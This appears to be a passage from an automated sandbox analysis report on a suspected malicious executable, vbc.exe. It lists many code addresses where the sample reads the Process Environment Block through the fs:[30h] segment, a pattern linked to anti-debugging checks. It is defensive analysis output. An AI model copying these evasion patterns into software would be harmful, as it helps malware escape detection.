Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015E002D mov eax, dword ptr fs:[00000030h] 6_2_015E002D
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015E002D mov eax, dword ptr fs:[00000030h] 6_2_015E002D
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015E002D mov eax, dword ptr fs:[00000030h] 6_2_015E002D
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015E002D mov eax, dword ptr fs:[00000030h] 6_2_015E002D
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015E002D mov eax, dword ptr fs:[00000030h] 6_2_015E002D
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01637016 mov eax, dword ptr fs:[00000030h] 6_2_01637016
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01637016 mov eax, dword ptr fs:[00000030h] 6_2_01637016
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01637016 mov eax, dword ptr fs:[00000030h] 6_2_01637016
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015CB02A mov eax, dword ptr fs:[00000030h] 6_2_015CB02A
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015CB02A mov eax, dword ptr fs:[00000030h] 6_2_015CB02A
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015CB02A mov eax, dword ptr fs:[00000030h] 6_2_015CB02A
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015CB02A mov eax, dword ptr fs:[00000030h] 6_2_015CB02A
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01684015 mov eax, dword ptr fs:[00000030h] 6_2_01684015
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01684015 mov eax, dword ptr fs:[00000030h] 6_2_01684015
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_0164B8D0 mov eax, dword ptr fs:[00000030h] 6_2_0164B8D0
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_0164B8D0 mov ecx, dword ptr fs:[00000030h] 6_2_0164B8D0
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_0164B8D0 mov eax, dword ptr fs:[00000030h] 6_2_0164B8D0
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_0164B8D0 mov eax, dword ptr fs:[00000030h] 6_2_0164B8D0
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_0164B8D0 mov eax, dword ptr fs:[00000030h] 6_2_0164B8D0
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_0164B8D0 mov eax, dword ptr fs:[00000030h] 6_2_0164B8D0
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015B58EC mov eax, dword ptr fs:[00000030h] 6_2_015B58EC
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015DB8E4 mov eax, dword ptr fs:[00000030h] 6_2_015DB8E4
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015DB8E4 mov eax, dword ptr fs:[00000030h] 6_2_015DB8E4
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015B40E1 mov eax, dword ptr fs:[00000030h] 6_2_015B40E1
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015B40E1 mov eax, dword ptr fs:[00000030h] 6_2_015B40E1
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015B40E1 mov eax, dword ptr fs:[00000030h] 6_2_015B40E1
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015B9080 mov eax, dword ptr fs:[00000030h] 6_2_015B9080
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015EF0BF mov ecx, dword ptr fs:[00000030h] 6_2_015EF0BF
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015EF0BF mov eax, dword ptr fs:[00000030h] 6_2_015EF0BF
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015EF0BF mov eax, dword ptr fs:[00000030h] 6_2_015EF0BF
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01633884 mov eax, dword ptr fs:[00000030h] 6_2_01633884
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01633884 mov eax, dword ptr fs:[00000030h] 6_2_01633884
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F90AF mov eax, dword ptr fs:[00000030h] 6_2_015F90AF
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015E20A0 mov eax, dword ptr fs:[00000030h] 6_2_015E20A0
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015E20A0 mov eax, dword ptr fs:[00000030h] 6_2_015E20A0
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015E20A0 mov eax, dword ptr fs:[00000030h] 6_2_015E20A0
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015E20A0 mov eax, dword ptr fs:[00000030h] 6_2_015E20A0
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015E20A0 mov eax, dword ptr fs:[00000030h] 6_2_015E20A0
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015E20A0 mov eax, dword ptr fs:[00000030h] 6_2_015E20A0
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015BF358 mov eax, dword ptr fs:[00000030h] 6_2_015BF358
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015BDB40 mov eax, dword ptr fs:[00000030h] 6_2_015BDB40
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015E3B7A mov eax, dword ptr fs:[00000030h] 6_2_015E3B7A
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015E3B7A mov eax, dword ptr fs:[00000030h] 6_2_015E3B7A
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01688B58 mov eax, dword ptr fs:[00000030h] 6_2_01688B58
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015BDB60 mov ecx, dword ptr fs:[00000030h] 6_2_015BDB60
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015DA309 mov eax, dword ptr fs:[00000030h] 6_2_015DA309
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015DA309 mov eax, dword ptr fs:[00000030h] 6_2_015DA309
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015DA309 mov eax, dword ptr fs:[00000030h] 6_2_015DA309
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015DA309 mov eax, dword ptr fs:[00000030h] 6_2_015DA309
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015DA309 mov eax, dword ptr fs:[00000030h] 6_2_015DA309
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015DA309 mov eax, dword ptr fs:[00000030h] 6_2_015DA309
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015DA309 mov eax, dword ptr fs:[00000030h] 6_2_015DA309
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015DA309 mov eax, dword ptr fs:[00000030h] 6_2_015DA309
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015DA309 mov eax, dword ptr fs:[00000030h] 6_2_015DA309
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015DA309 mov eax, dword ptr fs:[00000030h] 6_2_015DA309
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015DA309 mov eax, dword ptr fs:[00000030h] 6_2_015DA309
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015DA309 mov eax, dword ptr fs:[00000030h] 6_2_015DA309
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015DA309 mov eax, dword ptr fs:[00000030h] 6_2_015DA309
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015DA309 mov eax, dword ptr fs:[00000030h] 6_2_015DA309
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015DA309 mov eax, dword ptr fs:[00000030h] 6_2_015DA309
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015DA309 mov eax, dword ptr fs:[00000030h] 6_2_015DA309
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015DA309 mov eax, dword ptr fs:[00000030h] 6_2_015DA309
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015DA309 mov eax, dword ptr fs:[00000030h] 6_2_015DA309
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015DA309 mov eax, dword ptr fs:[00000030h] 6_2_015DA309
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015DA309 mov eax, dword ptr fs:[00000030h] 6_2_015DA309
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015DA309 mov eax, dword ptr fs:[00000030h] 6_2_015DA309
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_0167131B mov eax, dword ptr fs:[00000030h] 6_2_0167131B
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_016623E3 mov ecx, dword ptr fs:[00000030h] 6_2_016623E3
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_016623E3 mov ecx, dword ptr fs:[00000030h] 6_2_016623E3
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_016623E3 mov eax, dword ptr fs:[00000030h] 6_2_016623E3
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_016353CA mov eax, dword ptr fs:[00000030h] 6_2_016353CA
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_016353CA mov eax, dword ptr fs:[00000030h] 6_2_016353CA
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015DDBE9 mov eax, dword ptr fs:[00000030h] 6_2_015DDBE9
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015E03E2 mov eax, dword ptr fs:[00000030h] 6_2_015E03E2
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015E03E2 mov eax, dword ptr fs:[00000030h] 6_2_015E03E2
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015E03E2 mov eax, dword ptr fs:[00000030h] 6_2_015E03E2
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015E03E2 mov eax, dword ptr fs:[00000030h] 6_2_015E03E2
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015E03E2 mov eax, dword ptr fs:[00000030h] 6_2_015E03E2
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015E03E2 mov eax, dword ptr fs:[00000030h] 6_2_015E03E2
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015E2397 mov eax, dword ptr fs:[00000030h] 6_2_015E2397
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01685BA5 mov eax, dword ptr fs:[00000030h] 6_2_01685BA5
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015EB390 mov eax, dword ptr fs:[00000030h] 6_2_015EB390
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015C1B8F mov eax, dword ptr fs:[00000030h] 6_2_015C1B8F
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015C1B8F mov eax, dword ptr fs:[00000030h] 6_2_015C1B8F
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_0166D380 mov ecx, dword ptr fs:[00000030h] 6_2_0166D380
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_0167138A mov eax, dword ptr fs:[00000030h] 6_2_0167138A
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015E4BAD mov eax, dword ptr fs:[00000030h] 6_2_015E4BAD
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015E4BAD mov eax, dword ptr fs:[00000030h] 6_2_015E4BAD
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015E4BAD mov eax, dword ptr fs:[00000030h] 6_2_015E4BAD
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_0166B260 mov eax, dword ptr fs:[00000030h] 6_2_0166B260
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_0166B260 mov eax, dword ptr fs:[00000030h] 6_2_0166B260
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01688A62 mov eax, dword ptr fs:[00000030h] 6_2_01688A62
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015B9240 mov eax, dword ptr fs:[00000030h] 6_2_015B9240
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015B9240 mov eax, dword ptr fs:[00000030h] 6_2_015B9240
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015B9240 mov eax, dword ptr fs:[00000030h] 6_2_015B9240
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015B9240 mov eax, dword ptr fs:[00000030h] 6_2_015B9240
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F927A mov eax, dword ptr fs:[00000030h] 6_2_015F927A
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_0167EA55 mov eax, dword ptr fs:[00000030h] 6_2_0167EA55
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01644257 mov eax, dword ptr fs:[00000030h] 6_2_01644257
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015D3A1C mov eax, dword ptr fs:[00000030h] 6_2_015D3A1C
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015B5210 mov eax, dword ptr fs:[00000030h] 6_2_015B5210
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015B5210 mov ecx, dword ptr fs:[00000030h] 6_2_015B5210
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015B5210 mov eax, dword ptr fs:[00000030h] 6_2_015B5210
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015B5210 mov eax, dword ptr fs:[00000030h] 6_2_015B5210
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015BAA16 mov eax, dword ptr fs:[00000030h] 6_2_015BAA16
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015BAA16 mov eax, dword ptr fs:[00000030h] 6_2_015BAA16
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015C8A0A mov eax, dword ptr fs:[00000030h] 6_2_015C8A0A
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_0167AA16 mov eax, dword ptr fs:[00000030h] 6_2_0167AA16
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_0167AA16 mov eax, dword ptr fs:[00000030h] 6_2_0167AA16
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F4A2C mov eax, dword ptr fs:[00000030h] 6_2_015F4A2C
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F4A2C mov eax, dword ptr fs:[00000030h] 6_2_015F4A2C
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015DA229 mov eax, dword ptr fs:[00000030h] 6_2_015DA229
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015DA229 mov eax, dword ptr fs:[00000030h] 6_2_015DA229
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015DA229 mov eax, dword ptr fs:[00000030h] 6_2_015DA229
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015DA229 mov eax, dword ptr fs:[00000030h] 6_2_015DA229
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015DA229 mov eax, dword ptr fs:[00000030h] 6_2_015DA229
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015DA229 mov eax, dword ptr fs:[00000030h] 6_2_015DA229
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015DA229 mov eax, dword ptr fs:[00000030h] 6_2_015DA229
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015DA229 mov eax, dword ptr fs:[00000030h] 6_2_015DA229
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015DA229 mov eax, dword ptr fs:[00000030h] 6_2_015DA229
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01674AEF mov eax, dword ptr fs:[00000030h] 6_2_01674AEF
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01674AEF mov eax, dword ptr fs:[00000030h] 6_2_01674AEF
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01674AEF mov eax, dword ptr fs:[00000030h] 6_2_01674AEF
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01674AEF mov eax, dword ptr fs:[00000030h] 6_2_01674AEF
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01674AEF mov eax, dword ptr fs:[00000030h] 6_2_01674AEF
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01674AEF mov eax, dword ptr fs:[00000030h] 6_2_01674AEF
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01674AEF mov eax, dword ptr fs:[00000030h] 6_2_01674AEF
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01674AEF mov eax, dword ptr fs:[00000030h] 6_2_01674AEF
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01674AEF mov eax, dword ptr fs:[00000030h] 6_2_01674AEF
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01674AEF mov eax, dword ptr fs:[00000030h] 6_2_01674AEF
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01674AEF mov eax, dword ptr fs:[00000030h] 6_2_01674AEF
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01674AEF mov eax, dword ptr fs:[00000030h] 6_2_01674AEF
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01674AEF mov eax, dword ptr fs:[00000030h] 6_2_01674AEF
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01674AEF mov eax, dword ptr fs:[00000030h] 6_2_01674AEF
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015E2ACB mov eax, dword ptr fs:[00000030h] 6_2_015E2ACB
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015E2AE4 mov eax, dword ptr fs:[00000030h] 6_2_015E2AE4
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015ED294 mov eax, dword ptr fs:[00000030h] 6_2_015ED294
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015ED294 mov eax, dword ptr fs:[00000030h] 6_2_015ED294
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015CAAB0 mov eax, dword ptr fs:[00000030h] 6_2_015CAAB0
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015CAAB0 mov eax, dword ptr fs:[00000030h] 6_2_015CAAB0
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015EFAB0 mov eax, dword ptr fs:[00000030h] 6_2_015EFAB0
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015B52A5 mov eax, dword ptr fs:[00000030h] 6_2_015B52A5
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015B52A5 mov eax, dword ptr fs:[00000030h] 6_2_015B52A5
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015B52A5 mov eax, dword ptr fs:[00000030h] 6_2_015B52A5
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015B52A5 mov eax, dword ptr fs:[00000030h] 6_2_015B52A5
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015B52A5 mov eax, dword ptr fs:[00000030h] 6_2_015B52A5
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015D7D50 mov eax, dword ptr fs:[00000030h] 6_2_015D7D50
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F3D43 mov eax, dword ptr fs:[00000030h] 6_2_015F3D43
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01633540 mov eax, dword ptr fs:[00000030h] 6_2_01633540
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01663D40 mov eax, dword ptr fs:[00000030h] 6_2_01663D40
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015DC577 mov eax, dword ptr fs:[00000030h] 6_2_015DC577
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015DC577 mov eax, dword ptr fs:[00000030h] 6_2_015DC577
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_0163A537 mov eax, dword ptr fs:[00000030h] 6_2_0163A537
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01688D34 mov eax, dword ptr fs:[00000030h] 6_2_01688D34
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_0167E539 mov eax, dword ptr fs:[00000030h] 6_2_0167E539
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015E4D3B mov eax, dword ptr fs:[00000030h] 6_2_015E4D3B
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015E4D3B mov eax, dword ptr fs:[00000030h] 6_2_015E4D3B
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015E4D3B mov eax, dword ptr fs:[00000030h] 6_2_015E4D3B
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015C3D34 mov eax, dword ptr fs:[00000030h] 6_2_015C3D34
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015C3D34 mov eax, dword ptr fs:[00000030h] 6_2_015C3D34
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015C3D34 mov eax, dword ptr fs:[00000030h] 6_2_015C3D34
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015C3D34 mov eax, dword ptr fs:[00000030h] 6_2_015C3D34
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015C3D34 mov eax, dword ptr fs:[00000030h] 6_2_015C3D34
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015C3D34 mov eax, dword ptr fs:[00000030h] 6_2_015C3D34
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015C3D34 mov eax, dword ptr fs:[00000030h] 6_2_015C3D34
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015C3D34 mov eax, dword ptr fs:[00000030h] 6_2_015C3D34
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015C3D34 mov eax, dword ptr fs:[00000030h] 6_2_015C3D34
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015C3D34 mov eax, dword ptr fs:[00000030h] 6_2_015C3D34
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015C3D34 mov eax, dword ptr fs:[00000030h] 6_2_015C3D34
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015C3D34 mov eax, dword ptr fs:[00000030h] 6_2_015C3D34
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015C3D34 mov eax, dword ptr fs:[00000030h] 6_2_015C3D34
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015BAD30 mov eax, dword ptr fs:[00000030h] 6_2_015BAD30
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_0167FDE2 mov eax, dword ptr fs:[00000030h] 6_2_0167FDE2
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_0167FDE2 mov eax, dword ptr fs:[00000030h] 6_2_0167FDE2
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_0167FDE2 mov eax, dword ptr fs:[00000030h] 6_2_0167FDE2
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_0167FDE2 mov eax, dword ptr fs:[00000030h] 6_2_0167FDE2
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01668DF1 mov eax, dword ptr fs:[00000030h] 6_2_01668DF1
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01636DC9 mov eax, dword ptr fs:[00000030h] 6_2_01636DC9
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01636DC9 mov eax, dword ptr fs:[00000030h] 6_2_01636DC9
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01636DC9 mov eax, dword ptr fs:[00000030h] 6_2_01636DC9
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01636DC9 mov ecx, dword ptr fs:[00000030h] 6_2_01636DC9
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01636DC9 mov eax, dword ptr fs:[00000030h] 6_2_01636DC9
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01636DC9 mov eax, dword ptr fs:[00000030h] 6_2_01636DC9
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015CD5E0 mov eax, dword ptr fs:[00000030h] 6_2_015CD5E0
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015CD5E0 mov eax, dword ptr fs:[00000030h] 6_2_015CD5E0
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_016805AC mov eax, dword ptr fs:[00000030h] 6_2_016805AC
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_016805AC mov eax, dword ptr fs:[00000030h] 6_2_016805AC
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015EFD9B mov eax, dword ptr fs:[00000030h] 6_2_015EFD9B
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015EFD9B mov eax, dword ptr fs:[00000030h] 6_2_015EFD9B
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015B2D8A mov eax, dword ptr fs:[00000030h] 6_2_015B2D8A
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015B2D8A mov eax, dword ptr fs:[00000030h] 6_2_015B2D8A
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015B2D8A mov eax, dword ptr fs:[00000030h] 6_2_015B2D8A
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015B2D8A mov eax, dword ptr fs:[00000030h] 6_2_015B2D8A
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015B2D8A mov eax, dword ptr fs:[00000030h] 6_2_015B2D8A
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015E2581 mov eax, dword ptr fs:[00000030h] 6_2_015E2581
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015E2581 mov eax, dword ptr fs:[00000030h] 6_2_015E2581
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015E2581 mov eax, dword ptr fs:[00000030h] 6_2_015E2581
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015E2581 mov eax, dword ptr fs:[00000030h] 6_2_015E2581
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01672D82 mov eax, dword ptr fs:[00000030h] 6_2_01672D82
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01672D82 mov eax, dword ptr fs:[00000030h] 6_2_01672D82
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01672D82 mov eax, dword ptr fs:[00000030h] 6_2_01672D82
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01672D82 mov eax, dword ptr fs:[00000030h] 6_2_01672D82
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01672D82 mov eax, dword ptr fs:[00000030h] 6_2_01672D82
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01672D82 mov eax, dword ptr fs:[00000030h] 6_2_01672D82
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01672D82 mov eax, dword ptr fs:[00000030h] 6_2_01672D82
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015E1DB5 mov eax, dword ptr fs:[00000030h] 6_2_015E1DB5
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015E1DB5 mov eax, dword ptr fs:[00000030h] 6_2_015E1DB5
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015E1DB5 mov eax, dword ptr fs:[00000030h] 6_2_015E1DB5
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015E35A1 mov eax, dword ptr fs:[00000030h] 6_2_015E35A1
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015EA44B mov eax, dword ptr fs:[00000030h] 6_2_015EA44B
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015EAC7B mov eax, dword ptr fs:[00000030h] 6_2_015EAC7B
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015EAC7B mov eax, dword ptr fs:[00000030h] 6_2_015EAC7B
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015EAC7B mov eax, dword ptr fs:[00000030h] 6_2_015EAC7B
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015EAC7B mov eax, dword ptr fs:[00000030h] 6_2_015EAC7B
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015EAC7B mov eax, dword ptr fs:[00000030h] 6_2_015EAC7B
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015EAC7B mov eax, dword ptr fs:[00000030h] 6_2_015EAC7B
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015EAC7B mov eax, dword ptr fs:[00000030h] 6_2_015EAC7B
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015EAC7B mov eax, dword ptr fs:[00000030h] 6_2_015EAC7B
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015EAC7B mov eax, dword ptr fs:[00000030h] 6_2_015EAC7B
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015EAC7B mov eax, dword ptr fs:[00000030h] 6_2_015EAC7B
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015EAC7B mov eax, dword ptr fs:[00000030h] 6_2_015EAC7B
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015D746D mov eax, dword ptr fs:[00000030h] 6_2_015D746D
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_0164C450 mov eax, dword ptr fs:[00000030h] 6_2_0164C450
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_0164C450 mov eax, dword ptr fs:[00000030h] 6_2_0164C450
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01671C06 mov eax, dword ptr fs:[00000030h] 6_2_01671C06
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01671C06 mov eax, dword ptr fs:[00000030h] 6_2_01671C06
